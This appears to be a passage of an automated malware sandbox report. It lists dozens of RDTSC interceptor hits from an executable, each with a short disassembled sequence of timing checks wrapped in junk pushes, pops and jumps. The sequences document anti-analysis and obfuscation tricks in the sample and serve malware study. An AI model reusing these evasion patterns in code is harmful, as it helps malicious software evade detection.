Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A6F97F second address: A6F993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F97B4EC49BBh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A6F993 second address: A6F998 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A7744A second address: A7744E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A75E91 second address: A75E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A75E97 second address: A75E9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A75E9D second address: A75EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007F97B4F2EDD5h 0x0000000d jl 00007F97B4F2EDCCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A7600C second address: A76017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F97B4EC49B6h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A76017 second address: A7601C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A7601C second address: A76022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A76022 second address: A7602E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F97B4F2EDC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A766B5 second address: A766DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jg 00007F97B4EC49CFh 0x0000000d jmp 00007F97B4EC49C9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A766DB second address: A76706 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F97B4F2EDCEh 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F97B4F2EDC6h 0x00000010 jmp 00007F97B4F2EDCBh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jp 00007F97B4F2EDCCh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A76706 second address: A76723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4EC49C9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A76723 second address: A7672D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F97B4F2EDC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A77150 second address: A77169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jp 00007F97B4EC49BEh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A77169 second address: A7716F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A7716F second address: A77173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A77173 second address: A77177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A77177 second address: A77181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A77181 second address: A7718B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F97B4F2EDC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A79F2A second address: A79F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A8AF2D second address: A8AF31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A8AF31 second address: A8AF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F97B4EC49B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A8AF3D second address: A8AF54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD2h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A9A868 second address: A9A874 instructions: 0x00000000 rdtsc 0x00000002 js 00007F97B4EC49BEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A9A874 second address: A9A87B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A9A87B second address: A9A890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4EC49BDh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: A9A40B second address: A9A425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4F2EDD6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB57F4 second address: AB57F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB57F8 second address: AB5817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F97B4F2EDD9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB47FB second address: AB4803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB4803 second address: AB480C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB480C second address: AB4823 instructions: 0x00000000 rdtsc 0x00000002 je 00007F97B4EC49C9h 0x00000008 jmp 00007F97B4EC49BDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB520C second address: AB5220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4F2EDCDh 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB5220 second address: AB522E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F97B4EC49B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB5366 second address: AB536A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB536A second address: AB5376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB5376 second address: AB5385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jo 00007F97B4F2EDC6h 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB54E2 second address: AB54F2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F97B4EC49B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB6D35 second address: AB6D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB99E5 second address: AB99F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F97B4EC49B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB99F1 second address: AB99F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: AB99F5 second address: AB9A09 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F97B4EC49B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: ABC885 second address: ABC8E6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F97B4F2EDCAh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F97B4F2EDCEh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F97B4F2EDC8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov edx, dword ptr [ebp+122D2BB4h] 0x00000032 mov edx, ebx 0x00000034 push dword ptr [ebp+122D34DEh] 0x0000003a clc 0x0000003b push 9A6D1498h 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 push ebx 0x00000044 pop ebx 0x00000045 push eax 0x00000046 pop eax 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: ABC8E6 second address: ABC8F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F97B4EC49B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: ABE030 second address: ABE044 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F97B4F2EDD2h 0x0000000c jnl 00007F97B4F2EDC6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB01B2 second address: 4CB01CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB01CB second address: 4CB01E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB01E8 second address: 4CB02C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F97B4EC49C7h 0x00000011 sbb eax, 14F3142Eh 0x00000017 jmp 00007F97B4EC49C9h 0x0000001c popfd 0x0000001d call 00007F97B4EC49C0h 0x00000022 jmp 00007F97B4EC49C2h 0x00000027 pop ecx 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F97B4EC49C7h 0x00000031 add esi, 5AF79F9Eh 0x00000037 jmp 00007F97B4EC49C9h 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007F97B4EC49C0h 0x00000043 sub ax, 8998h 0x00000048 jmp 00007F97B4EC49BBh 0x0000004d popfd 0x0000004e popad 0x0000004f mov ebp, esp 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 mov ebx, 37548086h 0x00000059 mov esi, edx 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA0040 second address: 4CA00A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, BC8Eh 0x00000007 jmp 00007F97B4F2EDCFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F97B4F2EDD9h 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F97B4F2EDCEh 0x0000001b mov ebp, esp 0x0000001d jmp 00007F97B4F2EDD0h 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov dx, ED80h 0x0000002a mov ebx, 4DB761ACh 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA00A2 second address: 4CA00B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4EC49C1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CE0006 second address: 4CE002B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ebx, eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F97B4F2EDD6h 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov esi, edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CE002B second address: 4CE0050 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, edx 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F97B4EC49BBh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov edi, 19536476h 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CE0050 second address: 4CE0054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CE0054 second address: 4CE005A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CE005A second address: 4CE0060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CE0060 second address: 4CE0064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CE0064 second address: 4CE0068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C7011F second address: 4C70123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70123 second address: 4C70129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90C56 second address: 4C90C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90C5C second address: 4C90C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90C60 second address: 4C90C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90C64 second address: 4C90CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F97B4F2EDD0h 0x00000010 sbb al, FFFFFF98h 0x00000013 jmp 00007F97B4F2EDCBh 0x00000018 popfd 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F97B4F2EDCEh 0x00000024 add ecx, 6B225DF8h 0x0000002a jmp 00007F97B4F2EDCBh 0x0000002f popfd 0x00000030 mov ecx, 76D2772Fh 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90CBA second address: 4C90CBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90835 second address: 4C9086B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F97B4F2EDCAh 0x00000013 xor esi, 0D5AD2A8h 0x00000019 jmp 00007F97B4F2EDCBh 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C906FD second address: 4C9077D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, E5F4h 0x00000007 mov si, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F97B4EC49BFh 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F97B4EC49C4h 0x0000001c or si, A2D8h 0x00000021 jmp 00007F97B4EC49BBh 0x00000026 popfd 0x00000027 call 00007F97B4EC49C8h 0x0000002c mov di, si 0x0000002f pop ecx 0x00000030 popad 0x00000031 pop ebp 0x00000032 pushad 0x00000033 mov ax, dx 0x00000036 push eax 0x00000037 push edx 0x00000038 call 00007F97B4EC49C5h 0x0000003d pop esi 0x0000003e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90430 second address: 4C9045C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 5261022Ah 0x00000008 mov ebx, 07E516F6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F97B4F2EDD5h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C9045C second address: 4C90462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90462 second address: 4C90466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90466 second address: 4C9046A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA03BE second address: 4CA03E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA03E3 second address: 4CA03E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA03E7 second address: 4CA03ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA03ED second address: 4CA042C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F97B4EC49C0h 0x00000009 sub si, B008h 0x0000000e jmp 00007F97B4EC49BBh 0x00000013 popfd 0x00000014 mov dx, si 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F97B4EC49C1h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA042C second address: 4CA0432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0F2F second address: 4CD0F66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov eax, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebp 0x0000000c jmp 00007F97B4EC49C2h 0x00000011 mov dword ptr [esp], ebp 0x00000014 pushad 0x00000015 mov ebx, esi 0x00000017 mov ax, 6E59h 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov ax, dx 0x00000024 mov edx, 1F3133D0h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0F66 second address: 4CD0F6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, D6h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0F6D second address: 4CD0F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0F7B second address: 4CD0F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0F7F second address: 4CD0F85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB058B second address: 4CB0591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB0591 second address: 4CB05BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ebx, esi 0x0000000c jmp 00007F97B4EC49BCh 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 mov eax, 067B31ADh 0x00000019 call 00007F97B4EC49BAh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB05BD second address: 4CB05F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F97B4F2EDD8h 0x00000011 or cx, 9AA8h 0x00000016 jmp 00007F97B4F2EDCBh 0x0000001b popfd 0x0000001c mov edx, eax 0x0000001e popad 0x0000001f rdtsc
